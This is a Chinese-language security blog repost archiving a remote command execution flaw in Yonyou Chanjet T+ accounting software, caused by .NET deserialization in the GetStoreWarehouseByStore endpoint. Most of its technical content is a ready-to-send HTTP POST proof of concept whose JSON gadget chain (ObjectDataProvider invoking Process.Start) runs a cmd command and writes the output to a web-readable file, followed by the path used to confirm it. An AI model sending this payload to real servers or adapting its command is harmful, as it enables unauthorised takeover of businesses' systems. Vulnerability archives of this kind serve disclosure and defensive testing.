【漏洞归档】用友 畅捷通T+ GetStoreWarehouseByStore 远程命令执行漏洞

admin 2023年6月24日00:54:02评论286 views字数 1041阅读3分28秒阅读模式

漏洞描述

用友 畅捷通T+ GetStoreWarehouseByStore 存在 .net反序列化漏洞,导致远程命令执行,控制服务器

#漏洞影响


#网络测绘


#漏洞复现

登录页面

【漏洞归档】用友 畅捷通T+ GetStoreWarehouseByStore 远程命令执行漏洞

验证POC

POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
Connection: close
Content-Length: 668
X-Ajaxpro-Method: GetStoreWarehouseByStore
Accept-Encoding: gzip

{
"storeID":{
"__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
"MethodName":"Start",
"ObjectInstance":{
"__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
"StartInfo":{
"__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
"FileName":"cmd",
"Arguments":"/c whoami > C:/Progra~2/Chanjet/TPlusStd/WebSite/2RUsL6jgx9sGX4GItQBcVfxarBM.txt"
}
}
}
}

【漏洞归档】用友 畅捷通T+ GetStoreWarehouseByStore 远程命令执行漏洞

/tplus/xxx.txt

【漏洞归档】用友 畅捷通T+ GetStoreWarehouseByStore 远程命令执行漏洞

原文始发于微信公众号(利刃信安攻防实验室):【漏洞归档】用友 畅捷通T+ GetStoreWarehouseByStore 远程命令执行漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年6月24日00:54:02
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【漏洞归档】用友 畅捷通T+ GetStoreWarehouseByStore 远程命令执行漏洞https://cn-sec.com/archives/1828334.html

发表评论

匿名网友 填写信息